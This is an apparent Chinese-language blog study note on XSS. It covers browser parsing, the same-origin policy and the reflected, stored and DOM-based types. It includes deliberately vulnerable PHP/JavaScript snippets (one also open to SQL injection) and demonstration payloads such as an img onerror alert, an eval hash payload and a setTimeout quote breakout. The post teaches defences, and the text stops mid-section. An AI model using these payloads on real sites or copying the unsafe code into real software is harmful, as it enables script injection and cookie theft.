<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>关于xss | Hexo</title><meta name="author" content="xiexie"><meta name="copyright" content="xiexie"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="一、 浏览器底层机制与安全基石理解XSS的执行逻辑，必须建立在充分掌握浏览器渲染流程与同源策略的基础之上。 1. 浏览器渲染过程与 DOM 构建浏览器接收到HTML字节流后，需要将其解析为可供渲染和交互的结构。XSS代码的执行正是发生在这个解析阶段。  分词与打标签 (Tokenizing)：HTML解析器逐字读取字符序列，进行词法分析，识别出标签（如 &lt;html&gt;, &lt;body">
<meta property="og:type" content="article">
<meta property="og:title" content="关于xss">
<meta property="og:url" content="http://xiexie-qiuligao.github.io/2026/03/05/%E5%85%B3%E4%BA%8Exss/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一、 浏览器底层机制与安全基石理解XSS的执行逻辑，必须建立在充分掌握浏览器渲染流程与同源策略的基础之上。 1. 浏览器渲染过程与 DOM 构建浏览器接收到HTML字节流后，需要将其解析为可供渲染和交互的结构。XSS代码的执行正是发生在这个解析阶段。  分词与打标签 (Tokenizing)：HTML解析器逐字读取字符序列，进行词法分析，识别出标签（如 &lt;html&gt;, &lt;body">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://xiexie-qiuligao.github.io/img/1.png">
<meta property="article:published_time" content="2026-03-05T13:00:00.000Z">
<meta property="article:modified_time" content="2026-03-05T13:27:38.798Z">
<meta property="article:author" content="xiexie">
<meta property="article:tag" content="学习task">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://xiexie-qiuligao.github.io/img/1.png"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "关于xss",
  "url": "http://xiexie-qiuligao.github.io/2026/03/05/%E5%85%B3%E4%BA%8Exss/",
  "image": "http://xiexie-qiuligao.github.io/img/1.png",
  "datePublished": "2026-03-05T13:00:00.000Z",
  "dateModified": "2026-03-05T13:27:38.798Z",
  "author": [
    {
      "@type": "Person",
      "name": "xiexie",
      "url": "http://xiexie-qiuligao.github.io"
    }
  ]
}</script><link rel="shortcut icon" href="/img/1.png"><link rel="canonical" href="http://xiexie-qiuligao.github.io/2026/03/05/%E5%85%B3%E4%BA%8Exss/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css?v=5.5.3"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.1.0/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar@0.1.16/dist/snackbar.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@6.1.7/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: '复制成功',
    error: '复制失败',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: {"chs_to_cht":"已切换为繁体中文","cht_to_chs":"已切换为简体中文","day_to_night":"已切换为深色模式","night_to_day":"已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#1f1f1f","position":"bottom-left"},
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid@4.12.0/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: true,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '关于xss',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><meta name="generator" content="Hexo 8.1.1"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/1.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">17</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">4</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder"></i><span> Categories</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg fixed" id="page-header"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Hexo</span></a><a class="nav-page-title" href="/"><span class="site-name">关于xss</span><span class="site-name"><i class="fa-solid fa-circle-arrow-left"></i><span>  返回首页</span></span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder"></i><span> Categories</span></a></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="post-info"><h1 class="post-title">关于xss</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2026-03-05T13:00:00.000Z" title="发表于 2026-03-05 21:00:00">2026-03-05</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2026-03-05T13:27:38.798Z" title="更新于 2026-03-05 21:27:38">2026-03-05</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">总字数:</span><span class="word-count">5.6k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>20分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">浏览量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><div id="post-outdate-notice" data="{&quot;limitDay&quot;:365,&quot;messagePrev&quot;:&quot;It has been&quot;,&quot;messageNext&quot;:&quot;days since the last update, the content of the article may be outdated.&quot;,&quot;postUpdate&quot;:&quot;2026-03-05 21:27:38&quot;}" hidden></div><h2 id="一、-浏览器底层机制与安全基石"><a href="#一、-浏览器底层机制与安全基石" class="headerlink" title="一、 浏览器底层机制与安全基石"></a>一、 浏览器底层机制与安全基石</h2><p>理解XSS的执行逻辑，必须建立在充分掌握浏览器渲染流程与同源策略的基础之上。</p>
<h3 id="1-浏览器渲染过程与-DOM-构建"><a href="#1-浏览器渲染过程与-DOM-构建" class="headerlink" title="1. 浏览器渲染过程与 DOM 构建"></a>1. 浏览器渲染过程与 DOM 构建</h3><p>浏览器接收到HTML字节流后，需要将其解析为可供渲染和交互的结构。XSS代码的执行正是发生在这个解析阶段。</p>
<ul>
<li><p><strong>分词与打标签 (Tokenizing)</strong>：HTML解析器逐字读取字符序列，进行词法分析，识别出标签（如 <code>&lt;html&gt;</code>, <code>&lt;body&gt;</code>）并生成对应的Token。</p>
</li>
<li><p><strong>生成节点对象 (Lexing&#x2F;Node Generation)</strong>：将Token转化为具有DOM属性和方法的节点对象。</p>
</li>
<li><p><strong>构建 DOM 树 (Tree Construction)</strong>：根据HTML的嵌套关系，将节点对象按照层级挂载，形成完整的DOM树。DOM（文档对象模型）本质上是HTML文档在内存中的面向对象表示，它作为桥梁，使得JavaScript等脚本语言能够动态访问和更新文档的内容、结构和样式。</p>
</li>
<li><p><strong>安全解析机制（XSS的触发原理）</strong>：浏览器是一边解析HTML一边构建DOM的。<strong>当HTML解析器遇到 <code>&lt;script&gt;</code> 标签时，会阻塞DOM树的构建，将控制权交由JavaScript引擎执行脚本。</strong> 如果该段脚本是攻击者注入的恶意代码，就会在此刻被触发执行。对于 <code>&lt;img onerror&gt;</code> 等事件驱动的标签，则是在节点构建完成、外部资源加载失败或满足特定交互条件时触发脚本执行。</p>
</li>
</ul>
<h3 id="2-同源策略-Same-Origin-Policy-SOP"><a href="#2-同源策略-Same-Origin-Policy-SOP" class="headerlink" title="2. 同源策略 (Same-Origin Policy, SOP)"></a>2. 同源策略 (Same-Origin Policy, SOP)</h3><p>同源策略是Web浏览器最核心的安全模型，用于隔离潜在恶意文件。</p>
<ul>
<li><p><strong>同源的定义</strong>：两个URL的<strong>协议 (Protocol)</strong>、<strong>域名 (Domain)</strong>、<strong>端口 (Port)</strong> 必须完全一致。</p>
</li>
<li><p><strong>SOP的限制范围</strong>：</p>
<ul>
<li><p>禁止读取非同源的 Cookie、LocalStorage、IndexedDB 等本地存储。</p>
</li>
<li><p>禁止获取非同源文档的 DOM 节点（例如无法读取嵌入的跨域 <code>iframe</code> 内部的数据）。</p>
</li>
<li><p>限制跨域 AJAX&#x2F;Fetch 请求的响应读取。</p>
</li>
</ul>
</li>
<li><p><strong>SOP 与 XSS 的关系</strong>：攻击者无法直接在自己的服务器上写脚本去跨域读取目标网站的数据。（这里也是对csrf的一个大影响啊）因此，攻击者利用目标网站的输入&#x2F;输出过滤漏洞，将恶意脚本<strong>注入到目标网站的页面中</strong>。由于脚本在目标网站的域名下执行，完全符合同源策略，从而获得了目标域下的最高执行权限。</p>
</li>
</ul>
<hr>
<h2 id="二、-XSS-漏洞的三大核心类型与源码剖析"><a href="#二、-XSS-漏洞的三大核心类型与源码剖析" class="headerlink" title="二、 XSS 漏洞的三大核心类型与源码剖析"></a>二、 XSS 漏洞的三大核心类型与源码剖析</h2><p>XSS（跨站脚本攻击）的核心区别在于恶意代码的传递路径与触发节点。</p>
<h3 id="1-反射型-XSS-Reflected-XSS"><a href="#1-反射型-XSS-Reflected-XSS" class="headerlink" title="1. 反射型 XSS (Reflected XSS)"></a>1. 反射型 XSS (Reflected XSS)</h3><ul>
<li><p><strong>特征</strong>：非持久化。恶意脚本包含在客户端的HTTP请求（通常是URL参数）中，服务器接收后未做充分的清洗或转义，直接拼接到HTTP响应的HTML中返回给客户端，由浏览器解析执行。</p>
</li>
<li><p><strong>漏洞源码分析 (PHP)</strong>：</p>
<p>  PHP</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">// search.php</span><br><span class="line">&lt;?php </span><br><span class="line">// 缺陷：直接获取参数未作安全处理</span><br><span class="line">$search_query = $_GET[&#x27;query&#x27;]; </span><br><span class="line">?&gt; </span><br><span class="line">&lt;!DOCTYPE html&gt; </span><br><span class="line">&lt;html&gt; </span><br><span class="line">&lt;body&gt; </span><br><span class="line">  &lt;p&gt;搜索结果：&lt;?php echo $search_query; ?&gt;&lt;/p&gt; </span><br><span class="line">&lt;/body&gt; </span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>执行路径</strong>：攻击者构造URL <code>search.php?query=&lt;script&gt;alert(1)&lt;/script&gt;</code> -&gt; 受害者点击 -&gt; 服务器拼接Payload并返回 -&gt; 受害者浏览器执行脚本。</p>
</li>
</ul>
<h3 id="2-存储型-XSS-Stored-XSS"><a href="#2-存储型-XSS-Stored-XSS" class="headerlink" title="2. 存储型 XSS (Stored XSS)"></a>2. 存储型 XSS (Stored XSS)</h3><ul>
<li><p><strong>特征</strong>：持久化，危害范围广。应用程序接收包含恶意脚本的输入数据，并将其<strong>持久化存储（如数据库）</strong>。后续任何请求该数据的操作，都会导致恶意脚本被包含在响应中返回并执行。</p>
</li>
<li><p><strong>漏洞源码分析 (PHP + MySQL)</strong>：</p>
<p>  PHP</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">// 写入接口：save_message.php</span><br><span class="line">&lt;?php</span><br><span class="line">$message = $_POST[&#x27;content&#x27;]; </span><br><span class="line">$conn = mysqli_connect(&quot;localhost&quot;, &quot;root&quot;, &quot;password&quot;, &quot;test_db&quot;);</span><br><span class="line">// 缺陷：无过滤直接入库</span><br><span class="line">$sql = &quot;INSERT INTO message (content) VALUES (&#x27;$message&#x27;)&quot;;</span><br><span class="line">mysqli_query($conn, $sql);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">// 读取接口：show_message.php</span><br><span class="line">&lt;?php</span><br><span class="line">$conn = mysqli_connect(&quot;localhost&quot;, &quot;root&quot;, &quot;password&quot;, &quot;test_db&quot;);</span><br><span class="line">$sql = &quot;SELECT content FROM message&quot;;</span><br><span class="line">$result = mysqli_query($conn, $sql);</span><br><span class="line">// 缺陷：直接输出数据库内容，未进行HTML实体转义</span><br><span class="line">while($row = mysqli_fetch_assoc($result)) &#123;</span><br><span class="line">    echo &quot;&lt;div class=&#x27;msg&#x27;&gt;&quot; . $row[&#x27;content&#x27;] . &quot;&lt;/div&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>执行路径</strong>：攻击者提交Payload至数据库 -&gt; 多名用户访问展示页面 -&gt; 服务器读取Payload并随正常文档返回 -&gt; 所有访问者的浏览器执行脚本。</p>
</li>
</ul>
<h3 id="3-基于-DOM-的-XSS-DOM-based-XSS"><a href="#3-基于-DOM-的-XSS-DOM-based-XSS" class="headerlink" title="3. 基于 DOM 的 XSS (DOM-based XSS)"></a>3. 基于 DOM 的 XSS (DOM-based XSS)</h3><ul>
<li><p><strong>特征</strong>：<strong>恶意代码全程不经过服务器后端</strong>。漏洞存在于客户端JavaScript代码中。前端脚本不安全地读取了客户端可控的数据源（如 URL 参数、<code>location.hash</code>），并通过危险的 DOM API 将其动态插入到页面中引发执行。</p>
</li>
<li><p><strong>漏洞源码分析 (HTML&#x2F;JavaScript)</strong>：</p>
<p>  HTML</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">  &lt;div id=&quot;welcome&quot;&gt;&lt;/div&gt;</span><br><span class="line">  &lt;script&gt;</span><br><span class="line">    // 获取可控输入源 (Source)</span><br><span class="line">    var username = new URLSearchParams(location.search).get(&#x27;username&#x27;);</span><br><span class="line"></span><br><span class="line">    // 危险执行点 (Sink)：innerHTML会将传入的字符串当作HTML解析</span><br><span class="line">    document.getElementById(&#x27;welcome&#x27;).innerHTML = &quot;欢迎：&quot; + username;</span><br><span class="line">  &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>危险的 DOM API (Sinks)</strong>：</p>
<ul>
<li><p>直接解析HTML：<code>innerHTML</code>, <code>outerHTML</code>, <code>document.write()</code>。</p>
</li>
<li><p>执行字符串代码：<code>eval()</code>, <code>setTimeout()</code>, <code>setInterval()</code>。</p>
</li>
<li><p>动态设置属性：<code>location.href</code>, <code>onclick</code>, <code>onerror</code>。</p>
</li>
</ul>
</li>
</ul>
<p><code>innerHTML</code>, <code>outerHTML</code>, <code>document.write()</code><br>这三个是前端 JavaScript 中用于<strong>动态操作和修改网页内容</strong>的核心 API。它们之所以在 Web 安全（特别是 DOM 型 XSS）中被重点标记为“危险函数（Sinks）”，是因为<strong>它们都会将接收到的字符串直接交给浏览器的 HTML 解析器去解析渲染</strong>。</p>
<p>如果这些字符串包含了用户可控的恶意代码，浏览器就会把它们当成真正的 HTML 标签去执行。</p>
<h3 id="1-innerHTML-内部-HTML"><a href="#1-innerHTML-内部-HTML" class="headerlink" title="1. innerHTML (内部 HTML)"></a>1. <code>innerHTML</code> (内部 HTML)</h3><ul>
<li><p><strong>作用</strong>：获取或设置一个 HTML 元素<strong>内部</strong>的所有内容（包括子节点和文本）。</p>
</li>
<li><p><strong>行为</strong>：当你给 <code>innerHTML</code> 赋值一个字符串时，浏览器会销毁该元素原本的所有子节点，然后将这个新字符串当作 HTML 代码进行解析，并生成新的 DOM 节点填充进去。</p>
</li>
</ul>
<p><strong>代码示例：</strong></p>
<p>HTML</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;div id=&quot;box&quot;&gt;原始文本&lt;/div&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">  let el = document.getElementById(&#x27;box&#x27;);</span><br><span class="line">  // 修改 innerHTML</span><br><span class="line">  el.innerHTML = &quot;&lt;b&gt;加粗的新文本&lt;/b&gt;&quot;;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="2-outerHTML-外部-HTML"><a href="#2-outerHTML-外部-HTML" class="headerlink" title="2. outerHTML (外部 HTML)"></a>2. <code>outerHTML</code> (外部 HTML)</h3><ul>
<li><p><strong>作用</strong>：获取或设置一个 HTML 元素<strong>自身及其内部</strong>的所有内容。</p>
</li>
<li><p><strong>行为</strong>：与 <code>innerHTML</code> 相比，<code>outerHTML</code> 不仅会替换元素内部的内容，还会<strong>把元素自己也替换掉</strong>。</p>
</li>
</ul>
<p><strong>代码示例：</strong></p>
<p>HTML</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;div id=&quot;box&quot;&gt;原始文本&lt;/div&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">  let el = document.getElementById(&#x27;box&#x27;);</span><br><span class="line">  // 修改 outerHTML</span><br><span class="line">  el.outerHTML = &quot;&lt;p&gt;我变成了一个段落&lt;/p&gt;&quot;;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="3-document-write-文档写入"><a href="#3-document-write-文档写入" class="headerlink" title="3. document.write() (文档写入)"></a>3. <code>document.write()</code> (文档写入)</h3><ul>
<li><p><strong>作用</strong>：直接向 HTML 文档流中写入内容。这是一个非常古老且暴力的 API。</p>
</li>
<li><p><strong>行为</strong>：</p>
<ul>
<li><p>如果在页面<strong>正在加载</strong>时调用它，它会把字符串拼接到当前解析位置的 HTML 后面。</p>
</li>
<li><p>如果在页面<strong>已经加载完毕</strong>（如在 <code>window.onload</code> 或点击事件中）调用它，它会调用 <code>document.open()</code>，<strong>清空并重写整个网页的所有内容</strong>。</p>
</li>
</ul>
</li>
</ul>
<p><strong>代码示例：</strong></p>
<p>HTML</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;body&gt;</span><br><span class="line">  &lt;h1&gt;正常标题&lt;/h1&gt;</span><br><span class="line">  &lt;script&gt;</span><br><span class="line">    // 页面加载时执行</span><br><span class="line">    document.write(&quot;&lt;h2&gt;动态写入的标题&lt;/h2&gt;&quot;);</span><br><span class="line">  &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="为什么它们是-XSS-的“重灾区”？"><a href="#为什么它们是-XSS-的“重灾区”？" class="headerlink" title="为什么它们是 XSS 的“重灾区”？"></a>为什么它们是 XSS 的“重灾区”？</h3><p>在安全领域，我们把接受输入并执行敏感操作的函数称为 <strong>Sink（汇聚点&#x2F;执行点）</strong>。这三个 API 就是极其危险的 HTML 解析 Sink。</p>
<p>假设有一段存在漏洞的代码：</p>
<p>JavaScript</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">let userInput = new URLSearchParams(location.search).get(&#x27;name&#x27;);</span><br><span class="line">document.getElementById(&#x27;greeting&#x27;).innerHTML = userInput;</span><br></pre></td></tr></table></figure>

<p><strong>黑客视角的利用原理</strong>：</p>
<ol>
<li><p><strong>常规思维</strong>：黑客可能会输入 <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>。</p>
<ul>
<li><em>防御机制</em>：HTML5 标准规定，通过 <code>innerHTML</code> 或 <code>outerHTML</code> 插入的 <code>&lt;script&gt;</code> 标签<strong>不会被执行</strong>。这是浏览器的一种底层保护。</li>
</ul>
</li>
<li><p><strong>黑客的绕过（事件机制）</strong>：既然 <code>&lt;script&gt;</code> 不执行，黑客就会输入 <code>&lt;img src=x onerror=alert(1)&gt;</code>。</p>
<ul>
<li><em>破防</em>：<code>innerHTML</code> 会老老实实地解析出一个 <code>&lt;img&gt;</code> 标签，浏览器尝试去加载 <code>src=x</code>，加载失败，立刻触发 <code>onerror</code> 事件，执行了 <code>alert(1)</code>。此时 XSS 攻击成功！</li>
</ul>
</li>
</ol>
<h3 id="安全开发规范-防御方案"><a href="#安全开发规范-防御方案" class="headerlink" title="安全开发规范 (防御方案)"></a>安全开发规范 (防御方案)</h3><p>在日常全栈开发中，如果你只需要向页面中插入<strong>纯文本</strong>（比如用户的用户名、评论内容），<strong>绝对不要</strong>使用这三个 API。</p>
<p>应该使用安全的替代方案：</p>
<ul>
<li><strong><code>textContent</code></strong> 或 <strong><code>innerText</code></strong>：这两个属性只会把输入的字符串当作“纯文本”处理。即使你传入了 <code>&lt;img src=x onerror=alert(1)&gt;</code>，浏览器也只会把它当成一串普通的字符原样显示在屏幕上，绝不会去解析它，从而从根本上杜绝了 DOM 型 XSS。</li>
<li><strong>执行路径</strong>：攻击者构造URL <code>welcome.html?username=&lt;img src=x onerror=alert(1)&gt;</code> -&gt; 受害者点击 -&gt; 服务器返回合法静态页面 -&gt; 浏览器执行页面原有JS -&gt; 原有JS读取URL参数并注入DOM -&gt; 触发 <code>onerror</code> 执行。</li>
</ul>
<h3 id="4-执行字符串代码：eval-setTimeout-setInterval"><a href="#4-执行字符串代码：eval-setTimeout-setInterval" class="headerlink" title="4. 执行字符串代码：eval(), setTimeout(), setInterval()"></a>4. 执行字符串代码：<code>eval()</code>, <code>setTimeout()</code>, <code>setInterval()</code></h3><p>这类 API 的危险之处在于，它们拥有<strong>将普通的字符串转化为可执行 JavaScript 代码</strong>的最高权限。如果外部不可信数据流入了这些函数，就相当于直接把系统的控制台交给了黑客。</p>
<ul>
<li><p><strong><code>eval(string)</code></strong>：</p>
<ul>
<li><p><strong>作用</strong>：直接计算或执行传入的 JavaScript 字符串。</p>
</li>
<li><p><strong>漏洞场景</strong>：早期前端常用来解析 JSON 字符串，或者动态执行数学公式。</p>
</li>
<li><p><strong>源码剖析</strong>：</p>
<p>  JavaScript</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// 危险代码：直接把 URL 的 hash 部分当做代码执行</span><br><span class="line">let userMathExpression = location.hash.substring(1); </span><br><span class="line">let result = eval(userMathExpression); </span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>攻击Payload</strong>：攻击者构造链接 <code>http://target.com/#alert(document.cookie)</code>。<code>eval()</code> 会无条件执行 <code>alert()</code>，瞬间完成攻击。</p>
</li>
</ul>
</li>
<li><p><strong><code>setTimeout(string, delay)</code> 与 <code>setInterval(string, delay)</code></strong>：</p>
<ul>
<li><p><strong>作用</strong>：定时器函数。现代开发中，第一个参数通常传入一个<strong>回调函数</strong>，但由于历史兼容性原因，它们<strong>也允许传入一个字符串</strong>，并在延时后将该字符串作为 JS 代码执行。</p>
</li>
<li><p><strong>漏洞场景</strong>：</p>
<p>  JavaScript</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">let userName = new URLSearchParams(location.search).get(&#x27;name&#x27;);</span><br><span class="line">// 危险代码：将用户输入拼接到字符串中，交由 setTimeout 执行</span><br><span class="line">setTimeout(&quot;console.log(&#x27;欢迎, &quot; + userName + &quot;&#x27;)&quot;, 1000);</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>攻击Payload</strong>：攻击者输入 <code>?name=&#39;); alert(1); //</code>。 拼接后的字符串变成了：<code>console.log(&#39;欢迎, &#39;); alert(1); //&#39;)</code>。这导致原本的打印逻辑被闭合，紧接着执行了攻击者的注入代码，最后的 <code>//</code> 注释掉了多余的引号。</p>
</li>
</ul>
</li>
